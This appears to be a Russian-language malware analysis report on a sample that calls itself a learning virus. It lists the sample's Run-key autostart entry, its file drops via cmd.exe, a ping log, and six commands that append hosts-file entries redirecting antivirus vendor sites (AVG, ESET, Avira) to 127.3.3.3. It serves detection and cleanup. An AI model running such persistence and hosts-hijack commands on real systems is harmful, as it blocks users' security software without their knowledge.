Техническая информация
- Автозапуск при входе в систему (значение в ключе реестра Run): [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\run] 'virus' = 'C:\virus333.exe'
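- <Текущая директория>\virus333.exe (создаётся командой echo, см. ниже)
- C:\virus333.exe (создаётся командой copy, см. ниже)
- C:\333.txt (создаётся перенаправлением вывода ping, см. ниже)
- <Текущая директория>\virus333.exe (удаляется командой del, см. ниже)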
- DNS ASK google.com
- '%WINDIR%\syswow64\cmd.exe' /c echo Este es un archivo de prueba de la secuencia que ejecuta un MALWARE > virus333.exe
- '%WINDIR%\syswow64\cmd.exe' /c copy virus333.exe c:\virus333.exe
- '%WINDIR%\syswow64\cmd.exe' /c del virus333.exe
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\ping.exe -n 1 google.com >> c:\333.txt
- '%WINDIR%\syswow64\ping.exe' -n 1 google.com
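- Изменение файла hosts: следующие шесть команд дописывают в <DRIVERS>\etc\hosts записи, сопоставляющие домены антивирусных компаний с адресом 127.3.3.3 из диапазона замыкания на себя (127.0.0.0/8), из-за чего эти сайты перестают открываться на заражённой машине; при лечении эти строки нужно удалить из hosts. Символы '#' в части имён, по-видимому, маскируют буквы домена в самом отчёте.
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 avg.com >> <DRIVERS>\etc\hosts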
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 www.av#.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 eset.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 www.es##.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 avira.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c echo 127.3.3.3 www.av##a.com >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\msg.exe * PRESIONE F3 PARA DETENER ESTE VIRUS DE APRENDISAJE